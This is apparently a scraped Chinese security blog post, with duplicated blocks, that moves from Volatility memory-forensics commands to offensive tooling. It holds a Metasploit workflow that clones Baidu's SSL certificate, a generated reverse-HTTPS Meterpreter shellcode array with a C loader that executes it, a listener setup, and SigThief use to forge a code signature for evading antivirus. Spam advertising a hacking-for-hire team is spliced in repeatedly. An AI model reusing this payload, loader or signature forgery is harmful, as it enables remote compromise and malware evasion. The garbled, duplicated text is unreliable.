lyshark@Dell:/mnt/d$ volatility -f winxp.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/mnt/d/winxp.raw)
PAE type : PAE
DTB : 0xad6000L
KDBG : 0x80546ae0L
Number of Processors : 1
Image Type (Service Pack) : 3
KPCR for CPU 0 : 0xffdff000L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2020-03-13 02:08:21 UTC+0000
Image local date and time : 2020-03-13 10:08:21 +0800
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/mnt/d/winxp.raw)
PAE type : PAE
DTB : 0xad6000L
KDBG : 0x80546ae0L
Number of Processors : 1
Image Type (Service Pack) : 3
KPCR for CPU 0 : 0xffdff000L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2020-03-13 02:08:21 UTC+0000
Image local date and time : 2020-03-13 10:08:21 +0800
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
volatility -f winxp.raw --profile=WinXPSP3x86 pslis
volatility -f winxp.raw --profile=WinXPSP3x86 pstree
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
volatility -f winxp.raw --profile=WinXPSP3x86 pstree
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
检索命令历史 只能检索命令行历史 volatility -f winxp.raw --profile=WinXPSP3x86 cmdscan
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
lyshark@Dell:/mnt/d$ volatility -f winxp.raw --profile=WinXPSP3x86 dlllist -p 324
Volatility Foundation Volatility Framework 2.6
************************************************************************
FTPServer.exe pid: 324
Command line : "C:\Documents and Settings\Administrator\桌面\FTPServer.exe"
Service Pack 3
Base Size LoadCount LoadTime Path
---------- ---------- ---------- ------------------------------ ----
0x00400000 0x1f000 0xffff C:\Documents and Settings\Administrator\桌面\FTPServer.exe
0x7c920000 0x93000 0xffff C:\WINDOWS\system32\ntdll.dll
0x7c800000 0x11e000 0xffff C:\WINDOWS\system32\kernel32.dll
0x62500000 0x8000 0xffff C:\Documents and Settings\Administrator\桌面\network.dll
0x77be0000 0x58000 0xffff C:\WINDOWS\system32\msvcrt.dll
0x71a20000 0x17000 0xffff C:\WINDOWS\system32\WS2_32.DLL
0x77da0000 0xa9000 0xffff C:\WINDOWS\system32\ADVAPI32.dll
0x77e50000 0x92000 0xffff C:\WINDOWS\system32\RPCRT4.dll
0x77fc0000 0x11000 0xffff C:\WINDOWS\system32\Secur32.dll
0x71a10000 0x8000 0xffff C:\WINDOWS\system32\WS2HELP.dll
0x76d70000 0x22000 0x1 C:\WINDOWS\system32\Apphelp.dll
0x77bd0000 0x8000 0x1 C:\WINDOWS\system32\VERSION.dll
0x7c340000 0x56000 0x1 C:\Documents and Settings\Administrator\桌面\msvcr71.dll
0x719c0000 0x3e000 0x2 C:\WINDOWS\system32\mswsock.dll
0x60fd0000 0x55000 0x1 C:\WINDOWS\system32\hnetcfg.dll
0x77ef0000 0x49000 0x49 C:\WINDOWS\system32\GDI32.dll
0x77d10000 0x90000 0x74 C:\WINDOWS\system32\USER32.dll
0x76300000 0x1d000 0x2 C:\WINDOWS\system32\IMM32.DLL
0x62c20000 0x9000 0x1 C:\WINDOWS\system32\LPK.DLL
0x73fa0000 0x6b000 0x1 C:\WINDOWS\system32\USP10.dll
0x71a00000 0x8000 0x1 C:\WINDOWS\System32\wshtcpip.dll
0x765e0000 0x93000 0x6 C:\WINDOWS\system32\CRYPT32.dll
0x76db0000 0x12000 0x4 C:\WINDOWS\system32\MSASN1.dll
0x76680000 0xa6000 0x2 C:\WINDOWS\system32\WININET.dll
0x770f0000 0x8b000 0xe C:\WINDOWS\system32\OLEAUT32.dll
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
Volatility Foundation Volatility Framework 2.6
************************************************************************
FTPServer.exe pid: 324
Command line : "C:\Documents and Settings\Administrator\桌面\FTPServer.exe"
Service Pack 3
Base Size LoadCount LoadTime Path
---------- ---------- ---------- ------------------------------ ----
0x00400000 0x1f000 0xffff C:\Documents and Settings\Administrator\桌面\FTPServer.exe
0x7c920000 0x93000 0xffff C:\WINDOWS\system32\ntdll.dll
0x7c800000 0x11e000 0xffff C:\WINDOWS\system32\kernel32.dll
0x62500000 0x8000 0xffff C:\Documents and Settings\Administrator\桌面\network.dll
0x77be0000 0x58000 0xffff C:\WINDOWS\system32\msvcrt.dll
0x71a20000 0x17000 0xffff C:\WINDOWS\system32\WS2_32.DLL
0x77da0000 0xa9000 0xffff C:\WINDOWS\system32\ADVAPI32.dll
0x77e50000 0x92000 0xffff C:\WINDOWS\system32\RPCRT4.dll
0x77fc0000 0x11000 0xffff C:\WINDOWS\system32\Secur32.dll
0x71a10000 0x8000 0xffff C:\WINDOWS\system32\WS2HELP.dll
0x76d70000 0x22000 0x1 C:\WINDOWS\system32\Apphelp.dll
0x77bd0000 0x8000 0x1 C:\WINDOWS\system32\VERSION.dll
0x7c340000 0x56000 0x1 C:\Documents and Settings\Administrator\桌面\msvcr71.dll
0x719c0000 0x3e000 0x2 C:\WINDOWS\system32\mswsock.dll
0x60fd0000 0x55000 0x1 C:\WINDOWS\system32\hnetcfg.dll
0x77ef0000 0x49000 0x49 C:\WINDOWS\system32\GDI32.dll
0x77d10000 0x90000 0x74 C:\WINDOWS\system32\USER32.dll
0x76300000 0x1d000 0x2 C:\WINDOWS\system32\IMM32.DLL
0x62c20000 0x9000 0x1 C:\WINDOWS\system32\LPK.DLL
0x73fa0000 0x6b000 0x1 C:\WINDOWS\system32\USP10.dll
0x71a00000 0x8000 0x1 C:\WINDOWS\System32\wshtcpip.dll
0x765e0000 0x93000 0x6 C:\WINDOWS\system32\CRYPT32.dll
0x76db0000 0x12000 0x4 C:\WINDOWS\system32\MSASN1.dll
0x76680000 0xa6000 0x2 C:\WINDOWS\system32\WININET.dll
0x770f0000 0x8b000 0xe C:\WINDOWS\system32\OLEAUT32.dll
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
volatility -f winxp.raw --profile=WinXPSP3x86 hivelist
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
dump蜂巢文件(dump 系统安装的软件列表): volatility -f winxp.raw --profile=WinXPSP3x86 hivedump -o 0xe1452008
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
msf6> use auxiliary/gather/impersonate_ssl
msf6 auxiliary(gather/impersonate_ssl) > set rhost www.baidu.com
msf6 auxiliary(gather/impersonate_ssl) > run
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
msf6 auxiliary(gather/impersonate_ssl) > set rhost www.baidu.com
msf6 auxiliary(gather/impersonate_ssl) > run
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
msf auxiliary(impersonate_ssl) > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set STAGERVERIFYSSLCERT true
msf payload(reverse_https) > set HANDLERSSLCERT /root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem
msf payload(reverse_https) > set LHOST 192.168.140.128
msf payload(reverse_https) > set LPORT 8443
msf6 payload > generate -f c -o /root/shell.c
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
msf payload(reverse_https) > set STAGERVERIFYSSLCERT true
msf payload(reverse_https) > set HANDLERSSLCERT /root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem
msf payload(reverse_https) > set LHOST 192.168.140.128
msf payload(reverse_https) > set LPORT 8443
msf6 payload > generate -f c -o /root/shell.c
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
#include <Windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x8b\x52\x10\x57\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x8b\x58\x20\x50\x01\xd3"
"\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34\x8b\x01\xd6\x31\xc0\xac"
"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26"
"\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\xe8\x3e\x00\x00\x00"
"\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69"
"\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54"
"\x72\x69\x64\x65\x6e\x74\x2f\x37\x2e\x30\x3b\x20\x72\x76\x3a"
"\x31\x31\x2e\x30\x29\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b"
"\x6f\x00\x68\x3a\x56\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53"
"\x68\xfb\x20\x00\x00\xe8\x6a\x01\x00\x00\x2f\x72\x6a\x5f\x79"
"\x6d\x73\x34\x4b\x4f\x74\x6d\x72\x59\x61\x70\x67\x79\x37\x73"
"\x50\x52\x41\x4f\x65\x44\x6d\x76\x68\x35\x64\x4d\x46\x5f\x32"
"\x34\x6b\x44\x5a\x6d\x79\x43\x65\x69\x32\x33\x55\x75\x66\x58"
"\x68\x55\x41\x33\x54\x62\x43\x32\x6a\x70\x5a\x43\x49\x5f\x64"
"\x47\x65\x32\x70\x54\x69\x5a\x63\x79\x76\x68\x53\x6a\x5f\x37"
"\x51\x58\x5f\x73\x68\x33\x62\x67\x44\x36\x6a\x66\x69\x32\x46"
"\x55\x63\x4a\x65\x6a\x70\x4d\x74\x56\x53\x51\x67\x6f\x30\x67"
"\x48\x4a\x46\x4a\x6c\x36\x54\x52\x33\x78\x55\x6c\x6f\x44\x70"
"\x62\x36\x5a\x31\x68\x34\x32\x4a\x37\x6d\x35\x50\x5f\x54\x79"
"\x67\x44\x4d\x41\x4f\x71\x6e\x65\x52\x48\x39\x35\x53\x5a\x4c"
"\x54\x66\x57\x58\x74\x45\x4a\x38\x75\x6d\x2d\x4e\x55\x62\x6f"
"\x78\x66\x59\x58\x55\x34\x46\x76\x62\x48\x59\x35\x30\x6c\x6b"
"\x4f\x67\x48\x42\x43\x39\x4a\x4b\x41\x75\x38\x41\x6c\x37\x69"
"\x39\x51\x76\x4e\x30\x65\x6d\x37\x54\x70\x43\x5a\x65\x6b\x4b"
"\x72\x4b\x4f\x00\x50\x68\x57\x89\x9f\xc6\xff\xd5\x89\xc6\x53"
"\x68\x00\x32\xe8\x84\x53\x53\x53\x57\x53\x56\x68\xeb\x55\x2e"
"\x3b\xff\xd5\x96\x6a\x0a\x5f\x68\x80\x33\x00\x00\x89\xe0\x6a"
"\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x53\x53\x53"
"\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x14\x68\x88"
"\x13\x00\x00\x68\x44\xf0\x35\xe0\xff\xd5\x4f\x75\xcd\xe8\x4c"
"\x00\x00\x00\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00"
"\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68"
"\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0"
"\x74\xcf\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\x5f\xe8\x6b"
"\xff\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x34\x30\x2e"
"\x31\x32\x38\x00\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
typedef void(__stdcall* CODE) ();
int main()
{
//((void(*)(void))&buf)();
PVOID pFunction = NULL;
pFunction = VirtualAlloc(0, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(pFunction, buf, sizeof(buf));
CODE StartShell = (CODE)pFunction;
StartShell();
}
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x8b\x52\x10\x57\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x8b\x58\x20\x50\x01\xd3"
"\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34\x8b\x01\xd6\x31\xc0\xac"
"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26"
"\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\xe8\x3e\x00\x00\x00"
"\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69"
"\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54"
"\x72\x69\x64\x65\x6e\x74\x2f\x37\x2e\x30\x3b\x20\x72\x76\x3a"
"\x31\x31\x2e\x30\x29\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b"
"\x6f\x00\x68\x3a\x56\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53"
"\x68\xfb\x20\x00\x00\xe8\x6a\x01\x00\x00\x2f\x72\x6a\x5f\x79"
"\x6d\x73\x34\x4b\x4f\x74\x6d\x72\x59\x61\x70\x67\x79\x37\x73"
"\x50\x52\x41\x4f\x65\x44\x6d\x76\x68\x35\x64\x4d\x46\x5f\x32"
"\x34\x6b\x44\x5a\x6d\x79\x43\x65\x69\x32\x33\x55\x75\x66\x58"
"\x68\x55\x41\x33\x54\x62\x43\x32\x6a\x70\x5a\x43\x49\x5f\x64"
"\x47\x65\x32\x70\x54\x69\x5a\x63\x79\x76\x68\x53\x6a\x5f\x37"
"\x51\x58\x5f\x73\x68\x33\x62\x67\x44\x36\x6a\x66\x69\x32\x46"
"\x55\x63\x4a\x65\x6a\x70\x4d\x74\x56\x53\x51\x67\x6f\x30\x67"
"\x48\x4a\x46\x4a\x6c\x36\x54\x52\x33\x78\x55\x6c\x6f\x44\x70"
"\x62\x36\x5a\x31\x68\x34\x32\x4a\x37\x6d\x35\x50\x5f\x54\x79"
"\x67\x44\x4d\x41\x4f\x71\x6e\x65\x52\x48\x39\x35\x53\x5a\x4c"
"\x54\x66\x57\x58\x74\x45\x4a\x38\x75\x6d\x2d\x4e\x55\x62\x6f"
"\x78\x66\x59\x58\x55\x34\x46\x76\x62\x48\x59\x35\x30\x6c\x6b"
"\x4f\x67\x48\x42\x43\x39\x4a\x4b\x41\x75\x38\x41\x6c\x37\x69"
"\x39\x51\x76\x4e\x30\x65\x6d\x37\x54\x70\x43\x5a\x65\x6b\x4b"
"\x72\x4b\x4f\x00\x50\x68\x57\x89\x9f\xc6\xff\xd5\x89\xc6\x53"
"\x68\x00\x32\xe8\x84\x53\x53\x53\x57\x53\x56\x68\xeb\x55\x2e"
"\x3b\xff\xd5\x96\x6a\x0a\x5f\x68\x80\x33\x00\x00\x89\xe0\x6a"
"\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x53\x53\x53"
"\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x14\x68\x88"
"\x13\x00\x00\x68\x44\xf0\x35\xe0\xff\xd5\x4f\x75\xcd\xe8\x4c"
"\x00\x00\x00\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00"
"\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68"
"\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0"
"\x74\xcf\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\x5f\xe8\x6b"
"\xff\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x34\x30\x2e"
"\x31\x32\x38\x00\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
typedef void(__stdcall* CODE) ();
int main()
{
//((void(*)(void))&buf)();
PVOID pFunction = NULL;
pFunction = VirtualAlloc(0, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(pFunction, buf, sizeof(buf));
CODE StartShell = (CODE)pFunction;
StartShell();
}
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set HANDLERSSLCERT /root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem
msf exploit(handler) > set STAGERVERIFYSSLCERT true
msf exploit(handler) > set LPORT 8443
msf exploit(handler) > set LHOST 192.168.140.128
msf exploit(handler) > run -j
确保网站可以打开
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set HANDLERSSLCERT /root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem
msf exploit(handler) > set STAGERVERIFYSSLCERT true
msf exploit(handler) > set LPORT 8443
msf exploit(handler) > set LHOST 192.168.140.128
msf exploit(handler) > run -j
确保网站可以打开
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
.使用makecert命令制作证书,sv-私钥文件名,ss-主题的证书存储名称,n-证书颁发对象,r-证书存储位置
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
有些反病毒软件供应商优先考虑某些证书颁发机构而不检查签名是否真正有效,并且有一些只是检查以查看certTable是否填充了某些值。这个工具让你快速将从已签名的PE文件中删除签名并将其附加到另一个文件,修复证书表以对文件进行签名。
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
$ python sigthief.py -i ConsentUX.dll -t lyshark.exe -o check.exe
Output file: check.exe
Signature appended.
FIN.
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen
Output file: check.exe
Signature appended.
FIN.
渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
技术辅助 联系:@heianlianmen